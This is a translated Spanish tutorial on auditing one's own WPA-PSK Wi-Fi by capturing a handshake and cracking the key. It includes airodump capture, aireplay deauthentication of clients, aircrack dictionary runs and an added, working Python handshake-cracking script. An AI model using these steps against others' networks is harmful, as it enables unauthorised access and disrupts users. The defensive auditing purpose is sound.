- After analysing insecure wireless networks with WEP encryption, and the ease with which a WEP key can be recovered through traffic reinjection, deauthentication, fake authentication and data capture, we now face the challenge of checking the security of WPA networks. I will not explain the whole theory behind this type of security (I don't know all of it either), but the aim is to show that these networks are still not completely safe, although far less exposed than WEP, and that depending on how they are configured they can be quite solid. There are several flavours of WPA, but we will deal with the most common one in home networks, WPA-PSK, and leave aside the setups that use RADIUS servers. A WEP configuration cannot be rescued by good settings: it is insecure by design. WPA-PSK, on the other hand, can be very secure, as long as it is configured well.
Just to mention that this type of protection differs from WEP in that the keys actually used to encrypt traffic are dynamic: they are derived per client and per session and change from time to time, while the pre-shared key itself stays fixed (if I'm wrong about the details it doesn't matter, since what we are going to do is a practical example of how a potential unauthorised attacker would proceed).
But before we get to the demonstration, let me explain some very basic theoretical concepts.
Routers and wireless cards must share a password for the initial authentication. Think of a Windows 2000 Server domain, where you must enter a user name and password to access resources, or of any forum that asks for a user name and password: this is roughly the same thing.
So let's go hunting for this secret key and thus simulate an attack, so that based on the results we can configure our system to reach a high level of wireless security.
Sniffing does not require a lot of traffic; it is not about quantity but quality. The traffic we need is only produced when a client authenticates with the access point. So, although the amount of traffic is not important, the security level is much higher because the attacker must have the patience to wait for the right traffic. This exchange, in which the client station and the access point introduce themselves to each other, is called the "handshake".
It can be done from both Windows and Linux, with the proviso that the number of cards that allow attack 0 (client deauthentication) is much higher in Linux. When attack 0 is carried out, the legitimate clients reconnect and authenticate again, especially if Windows manages the wireless connection rather than the card vendor's own utility. In the latter case this automatic re-association is harder to notice and analyse. Note that with patience, and without launching any attack at all, the same thing can be achieved simply by observing and capturing traffic, since the handshake occurs every time a client connects to the access point.
It seems simple (and there is no need for thousands of captured packets), but it really isn't, and we can say that the security level is higher.
That statement needs the following qualification: once we have the right traffic (a single handshake is enough), it must be compared against the words of a dictionary (or by brute force). These dictionaries are just sequential text files where each line is a different string of characters. And here is the crucial point that determines whether a wireless network is secure or not: it depends only on us, unlike WEP, which is completely unsafe by definition regardless of what we do.
Imagine an ATM: you want to withdraw money but don't know the PIN, and there are only 10,000 possibilities (0000 to 9999). That is not many, and if the machine did not block the card after 3 attempts, all of them could easily be tested in a few days.
With WPA-PSK and the aircrack suite there is no limit on attempts, because we work offline on the captured traffic (it is as if we had at home a small safe with a 4-digit lock and could try every combination at our leisure).
But the secret key for this type of security does not have to be 4 decimal digits (like a PIN): it can be between 8 and 63 ASCII characters, as the Windows XP Professional SP2 wireless wizard will tell you. Each character can take many values, so a simple calculation shows that the total number of combinations grows enormously with the length of the key. It is true that not all ASCII characters can be used in a key, but the final number is still very high.
For example, counting only digits and letters, with no distinction between upper and lower case, gives about 37 symbols. If the key is 8 characters long, the possible combinations are 37^8, about 3.5e12, and with 63 characters about 6.3e98. No dictionary in the world contains all of these combinations. But proper names such as "Feliciano" or "Isabelle", animal names such as "rhino" or generic words such as "Internet" do appear in these dictionaries. Something like "ql9sj3rs7f" would be a good key; the problem is that we tend not to use keys of this kind, just as with our e-mail and website passwords, because they are hard to remember and end up on a sticky note on the monitor.
It seems we can start to breathe easy that nobody unauthorised will get into our wireless network and eat up the bandwidth of our Internet connection.
So never build a key from something a person would naturally remember. Personally I use keys that I almost always forget, and then I have to reset the access point to change it.
That said, this demonstration is designed so that we can test it on our own equipment and check the security level of our wireless installations. I always say that to be ready for people with the skills to get into our wireless network, you have to be better prepared than they are, and a simulated real attack against our own equipment gives us results worth examining.
- As I said, we test on our own equipment, so we will need the following:
1 .- A wireless router that supports WPA-PSK; the Zyxel supplied with ADSL kits will do. If you don't have a router, an access point works just as well, but I will explain it with this router. Strictly speaking we only need an access point rather than a router, but these routers already include one.
2 .- A PC (any PC) with 2 wireless cards: one for normal work and one for data capture. The card for the normal connection must support WPA-PSK; the capture card must support monitor mode and attack 0 in Linux and/or Windows. If only monitor mode is available it also works, but we will be more limited. I'll explain it in Linux with attack 0. If you want to see how attack 0 (deauthentication) is done in Windows, see the traffic injection manual for Windows.
3 .- Operating system: I'll explain it in Linux, but it is the same in Windows, except that attack 0 is slightly different there because it is only possible with an Atheros chipset card compatible with CommView for WiFi 5.2; if you don't have a card with that support you must wait for the client to authenticate on its own. Always remember that not all cards, in Linux or in Windows, allow attack 0.
Note: I will not explain how to configure the card for WPA-PSK in Windows; it is straightforward, and once you have seen how the router is configured you will understand how to do it on your Windows card.
In Linux I will explain how to configure the card for WPA-PSK, but only for the Conceptronic C54Ri: its Linux driver has its own quick method, while other cards need the wpa_supplicant suite.
As for configuring the capture card, I think we all know how to do that in Windows and Linux.
3 .- Setting up the access point/router and the wireless card (WPA-PSK)
Go into the router configuration via http or with its own utility. The good thing about http is that it works from both Linux and Windows and it is the best way for me (do it however you know or prefer).
We must find a section in the router like this:
It is in the Wireless LAN section, under 802.1x/WPA.
In Wireless Port Control select Authentication Required.
Leave the timers as they are; if they are zero, the values shown here will do.
In Key Management Protocol select WPA-PSK.
In Group Data Privacy select TKIP.
In Pre-Shared Key enter the password, which is what we are going to try to find; in my case I put "josemaria" (without the quotes), which could perfectly well be my name.
Now in Wireless LAN go to the Wireless section and tick "Enable Wireless LAN". Enter the network name (ESSID), in this case "Policia".
This ESSID can be set to hidden, but it will be visible for these tests. If it were hidden it would make no difference, since we already know how to obtain it and it does not matter for this type of attack.
I set channel 1, although any will do. I leave RTS and fragmentation alone; they are not used here.
Click "Apply" and the router is configured to work wirelessly with WPA-PSK security.
4 .- The CCW program and card setup for WPA-PSK
Since working in Linux, and more precisely typing commands, is stressful and tedious, I designed this small application.
This application is a simple graphical interface for running commands.
In any case I will write out the commands it executes.
Here it is:
It is quite useful. Today it is at version 7, and the project I started is now maintained by Uxio.
Now I'll explain how to do it in Linux for a Conceptronic C54Ri with the Ralink RT2500 chipset, but...
you must have the latest drivers installed. Visit the Linux driver area (the classic old one, but still functional).
I suppose it is valid for any card with the Ralink RT2500 chipset, such as the Conceptronic C54RC.
I use a driver that also supports traffic reinjection against WEP and does not need any patches.
Note: the new Linux driver area can be reached by clicking here.
I prepared a script to configure the card (name the script whatever you like).
Screen capture:
As you can see, I don't think anything needs explaining. Just that for other cards there are alternative ways of doing it, for example the wpa_supplicant suite (or any card-specific method). Here we simply run the script: ./wpa.sh
If you are using any version of CCW and have created the script in the same directory as the application (or copied it there), press the "Open shell" button and run: ./wpa.sh
Here is a picture taken after executing the script (basically from the ccw1 program):
We see that the card and the system recognise the router, so we know we have a wireless network set up with WPA-PSK security.
It is not even necessary to test Internet access; what we have now is enough to keep working.
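For cards whose driver has no quick method of its own, the wpa_supplicant route mentioned above needs a configuration file. The fragment below is an added example matching the router settings in section 3 (ESSID "Policia", WPA-PSK with TKIP, passphrase "josemaria"); it is not the author's wpa.sh script, whose contents are only shown as a screenshot. The control interface path is an assumption.

```ini
# wpa_supplicant.conf for the network configured on the router above.
# psk in quotes is the passphrase; wpa_supplicant derives the 256-bit PSK
# from it and the ESSID exactly as the router does.
ctrl_interface=/var/run/wpa_supplicant

network={
    ssid="Policia"
    proto=WPA
    key_mgmt=WPA-PSK
    pairwise=TKIP
    group=TKIP
    psk="josemaria"
}
```

Start it with something like `wpa_supplicant -Dwext -ira0 -c /etc/wpa_supplicant.conf` (driver backend and interface name assumed; use whatever your RT2500 driver exposes). `wpa_passphrase Policia josemaria` prints the same network block with the derived 64-hex-digit psk, which is the value an attacker ends up testing dictionary words against.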
5 .- General and specific capture
Now to what really matters. At this point we all know how to enter monitor mode; if you don't, I advise you to stop reading this manual and go to the guide on drivers for monitor mode in Windows.
I will do the insecurity study with my D-Link Super G G520 Rev. B3 (Atheros chipset, interface ath0). Activate the card with the appropriate command and execute "airmon.sh start ath0", or:
iwconfig ath0 mode monitor, or use the specific CCW1 button.
Check that all is well. In Windows you know the drill: run airodump with a card driver that supports monitor mode.
Here is a sample:
Now we scan all channels; in Windows the same, with airodump.
Command: airodump ath0 file 0 (interface, output prefix, channel 0 = hop over all channels), or click the specific CCW1 button.
And we get:
We see other signals; in this case they don't matter and for ethical reasons they are hidden. What matters is that we see the wireless network created by us with the router and the C54Ri card: the MAC of the router, the client's MAC, the ESSID and the channel.
Now note down all this data and enter it into the CCW1 application, or simply write it down.
In both Windows and Linux, close the capture.
In Windows, open airodump again and set it to capture only channel 1. When airodump in Windows asks y/n (save IVs only), answer no, so that we obtain a *.cap file; *.ivs files contain only IVs, which are useless for this type of security. IVs are only valid for recovering the key of WEP-encrypted networks.
Execute "airmon.sh start ath0 1"
or click the appropriate CCW1 button.
If you want to skip airmon.sh, the equivalent
is: iwconfig ath0 mode monitor channel 1
Now open airodump again with the following command, or using the CCW1 program:
airodump ath0 policiawpa 1
And we see something like this:
We are now ready to capture data. We reconnect
the client, i.e. the C54Ri, to the router.
We don't know whether the captured traffic is the right one, and besides, the data column shows only a "1".
No problem: we launch attack 0, either in Linux or with winyector.
6 .- Deauthentication of legitimate clients.
Attack 0 is carried out with the following command or the specific CCW1 button:
aireplay -0 5 -a MAC_AP -c MAC_CLIENTE ath0
But be careful: to be effective, try different bit rates.
Quote: iwconfig ath0 rate 54M or iwconfig ath0 rate 24M
I use this program because it prepares everything for me and saves me a lot of typing.
Here's a sample:
It is quite clear: first the capture process is started, and while it is running we launch attack 0. Some card and driver models can do both with the same card, in this case the Atheros (capture and injection).
And after attack 0 we get:
We
see that traffic has increased. If the capture had been running the whole time, stop it for a few minutes so that the key exchange between client and access point is produced correctly. At the same time the network name (ESSID) is also exchanged, so even if it were hidden it could easily be determined.
To carry out these attacks in Windows I recommend the traffic injection manual for Windows or
the aireplay injection manual for Windows (berni69).
7 .- Recovery of the secret key
I open a shell (however you like) and launch:
aircrack -a 2 -w /ruta_diccionario/dictionary policiawpa.cap
The file is the *.cap we got by not passing the IVs-only flag to airodump, and that is how we want it. In CCW1
deselect the "Save IVs only" checkbox, which is selected by default and would give you *.ivs files. This has been the same in all versions of ccw.
The path (ruta_diccionario) is any folder and must be given in full. The dictionary is just a plain sequential text file (nothing fancy, unlike a Word document). Each line of the file is a different string of characters (ultimately, a candidate key to be tested).
This is what running the command produces:
We have
a high-security WPA-PSK network and have obtained just one handshake, and that is enough. Now select the number corresponding to our WPA-PSK network in the list aircrack shows (3 in my case; check what each of you has in your own capture) and... wait, because there is still a lot to do. Many times you will be left scratching your head, so repeat the process with another dictionary.
There are many places on the Internet where you can get free dictionaries; I don't link them here because such pages tend to be short-lived. Several Linux LiveCDs also include dictionaries.
If the dictionary is good and the key is not very hard it can be found quickly; otherwise it may take a very long time, or forever: when aircrack finishes reading all the words without a match it prints EOF (end of file). Don't despair, try another dictionary. And if it never gives you the key, congratulations, you have configured your wireless network securely, though never 100% securely, never forget that...
If you have configured your wireless network with a low security level (still talking about WPA-PSK) you will see:
And I repeat, so that you see it is plain aircrack 2.3 without the ccw project on top.
Tip: if after several days you still haven't found it and you are getting nervous and doubting whether these wireless auditing tools work at all, listen to me: open the dictionary with a normal text editor (whichever you like) and add a line containing the secret key. You will see how it is found, proving that the study is valid for both negative and positive results in WPA-PSK key recovery.
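To make concrete what aircrack does with the handshake and the dictionary (sections 1 and 7 above), here is an added worked example, not code from the page or from the aircrack project. It derives the PMK from each candidate passphrase with PBKDF2-HMAC-SHA1 (4096 iterations, ESSID as salt), expands it into the PTK, takes the KCK and checks the HMAC-MD5 MIC of the second handshake message (key descriptor version 1, i.e. WPA with TKIP as configured on the router). The "capture" is constructed inside the script from the page's ESSID "Policia" and passphrase "josemaria"; the MAC addresses, nonces and EAPOL frame layout are made up for the example. Every line of the dictionary costs 4096 HMAC-SHA1 operations, which is why a run over a big dictionary ends in EOF only after days.

```python
"""Dictionary attack on a WPA-PSK (TKIP) four-way handshake, as aircrack -a 2 -w does.
Every byte of the 'capture' below is CONSTRUCTED for this example; it is not real."""
import hashlib
import hmac


def keyspace(alphabet_size: int, length: int) -> int:
    """Number of possible keys of a given length, e.g. keyspace(37, 8) == 37**8."""
    return alphabet_size ** length


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    # WPA-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes).
    # The ESSID is the salt, which is why an attacker needs it even when it is hidden.
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf512(key: bytes, label: bytes, data: bytes) -> bytes:
    # IEEE 802.11i PRF-512: concatenated HMAC-SHA1 blocks, counter byte appended last.
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def kck_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce) -> bytes:
    # PTK = PRF-512(PMK, "Pairwise key expansion", min(MAC)||max(MAC)||min(nonce)||max(nonce)).
    # Its first 16 bytes are the KCK, the key that authenticates the handshake messages.
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf512(pmk, b"Pairwise key expansion", data)[:16]


def eapol_mic(kck: bytes, eapol_frame_mic_zeroed: bytes) -> bytes:
    # Key descriptor version 1 (WPA/TKIP): MIC = HMAC-MD5 over the EAPOL frame, MIC field zeroed.
    # (With CCMP, descriptor version 2, it is HMAC-SHA1 truncated to 16 bytes instead.)
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.md5).digest()


def check_candidate(passphrase: str, hs: dict) -> bool:
    """True if this passphrase reproduces the MIC the legitimate client sent."""
    pmk = pmk_from_passphrase(passphrase, hs["ssid"])
    kck = kck_from_pmk(pmk, hs["ap_mac"], hs["sta_mac"], hs["anonce"], hs["snonce"])
    return hmac.compare_digest(eapol_mic(kck, hs["eapol"]), hs["mic"])


def dictionary_attack(hs: dict, wordlist):
    """Test each dictionary line like aircrack; None means EOF without a hit."""
    for line in wordlist:
        word = line.rstrip("\r\n")
        if 8 <= len(word) <= 63 and check_candidate(word, hs):  # valid PSK lengths only
            return word
    return None


def build_handshake(ssid, passphrase, ap_mac, sta_mac, anonce, snonce) -> dict:
    """Constructed stand-in for message 2 of the handshake (carries SNonce + client MIC)."""
    body = (b"\xfe"                   # descriptor type 254 = WPA (pre-RSN)
            + b"\x01\x09"             # key info: version 1 (TKIP/HMAC-MD5), pairwise, MIC bit
            + b"\x00\x20"             # key length 32
            + b"\x00" * 7 + b"\x01"   # replay counter
            + snonce                  # the nonce the client chose
            + b"\x00" * 16            # key IV
            + b"\x00" * 8             # RSC
            + b"\x00" * 8             # key ID
            + b"\x00" * 16            # MIC field, zeroed as it is for MIC computation
            + b"\x00\x00")            # key data length
    eapol = b"\x01\x03" + len(body).to_bytes(2, "big") + body   # EAPOL v1, type 3 = Key
    hs = {"ssid": ssid, "ap_mac": ap_mac, "sta_mac": sta_mac,
          "anonce": anonce, "snonce": snonce, "eapol": eapol}
    kck = kck_from_pmk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)
    hs["mic"] = eapol_mic(kck, eapol)   # what the legitimate client put on the air
    return hs


# Constructed capture: the page's ESSID and PSK; locally administered MACs and fixed nonces.
HANDSHAKE = build_handshake(
    ssid="Policia", passphrase="josemaria",
    ap_mac=bytes.fromhex("020000aabbcc"), sta_mac=bytes.fromhex("020000112233"),
    anonce=bytes(range(32)), snonce=bytes(range(32, 64)),
)

if __name__ == "__main__":
    print("37^8 =", keyspace(37, 8))
    # "rhino" is shorter than 8 characters, so it is skipped without deriving a PMK.
    print(dictionary_attack(HANDSHAKE, ["Feliciano", "Isabelle", "rhino", "Internet"]))
    print(dictionary_attack(HANDSHAKE, ["Feliciano", "josemaria"]))
```

The second call is the tip above in code form: appending the real key to the dictionary turns EOF into a hit, which shows the tool and the capture are fine and the only variable left is the quality of the dictionary against the quality of the key.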
Finally, I know this looks like a very solid security level, but bear in mind that what matters in this type of configuration is to capture the right traffic, and that keys built with everyday logic, the ones found in any dictionary, must be avoided; only then do we get real value from the wireless security settings.
A real attacker against our wireless network cannot add the key to the dictionary, because obviously they don't know it. So we are clear about what matters most: knowing how to configure our wireless equipment to give the system greater security (if we are not able to recover our own WPA-PSK key, have no doubt that it really is safe; the best defence is a good offence, you always have to analyse your system from the attacker's point of view and correct it in that direction, and we must be as well prepared as possible).
Remember that the captures were made at the time with the ccw1 application, but you now have the new ccw7 (it keeps the same ccw1 functions explained here, considerably extended).
Everything explained here is valid for the new aircrack-ng suite; you can check its command syntax at:
- The program
CCW is a simple graphical interface that gathers most of the actions involved in a wireless audit under Linux. Hence the name: Centro de Control Wireless.
Installation is very simple: all you need is to download and install Gambas beforehand, because the program uses its libraries. Gambas only needs to be installed; you don't have to do anything with it.
Version 7 requires gambas2, which is really very easy to install on Debian.
If you have Debian or Fedora Core, the best way to install gambas 1 and 2 is through the repositories.
To download gambas2 in binary form, sourceforge is the better option.
I should also mention that we have been talking about version 2.3 of C. Devine's suite, but there are updated versions with the same design, such as 2.41, and the new generation, aircrack-ng.
I think we can be comfortable with this kind of protection and nobody will steal our bandwidth, but only... if you use a password that is really hard to find in a dictionary.
New Windows tools to enhance WPA security analysis
Article source: http://hwagm.elhacker.net/wpa/wpa.htm#p5